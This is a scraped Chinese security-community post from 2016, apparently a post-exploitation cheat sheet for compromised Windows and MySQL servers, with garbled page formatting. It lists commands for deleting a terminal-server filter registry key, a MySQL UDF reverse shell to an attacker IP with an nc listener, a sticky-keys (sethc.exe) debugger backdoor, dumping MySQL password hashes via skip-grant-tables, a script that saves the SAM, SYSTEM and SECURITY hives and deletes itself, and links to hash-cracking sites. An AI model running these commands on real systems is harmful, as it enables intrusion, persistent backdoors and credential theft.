标签:
社区:i春秋时间:2016年8月13日14.00作者:Binghe
#读取注册表值: reg query "HKEY_LOCAL_MACHINE\Software\Terminalsoft\WTSFilter" / v tsdata #备份导出注册表项: regedit / e d : \freehost\jiqiren\web\Editor\js\wts.reg "HKEY_LOCAL_MACHINE\Software\Terminalsoft\WTSFilter" #删除注册表项: reg delete "HKEY_LOCAL_MACHINE\Software\Terminalsoft\WTSFilter" / va / f |
select * from mysql.func; |
create function backshell returns string soname ‘udf.dll‘; |
nc.exe - l - p - vv 51 |
select backshell ( ‘yourip‘ , 51 ) ; |
Create Function regwrite returns string soname ‘udf.dll‘; |
select regwrite ( “HKEY_LOCAL_MACHINE” , ”SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe” , ”debugger” , ”REG_SZ” , ”C : \\recycler\\cmd.exe” ) ; |
cd mysqlbin mysqld - nt –skip - grant - tables |
1
2
|
mysql - u root select user , password from mysql.user; |
1
2
3
4
5
|
< configuration > < system.web > < customErrors mode = ”Off” / > < / system.web > < / configuration > |
< !– #include file=”4.aspx” –> |
1
2
3
4
5
|
@echo off reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive del % 0 |
加载后我们可以看到一些信息,这些信息可能会有明文密码,我这里是没有的。
http://www.objectif-securite.ch/ophcrack.phphttp://www.cmd5.com/
标签:
原文地址:http://www.cnblogs.com/ichunqiu/p/5768448.html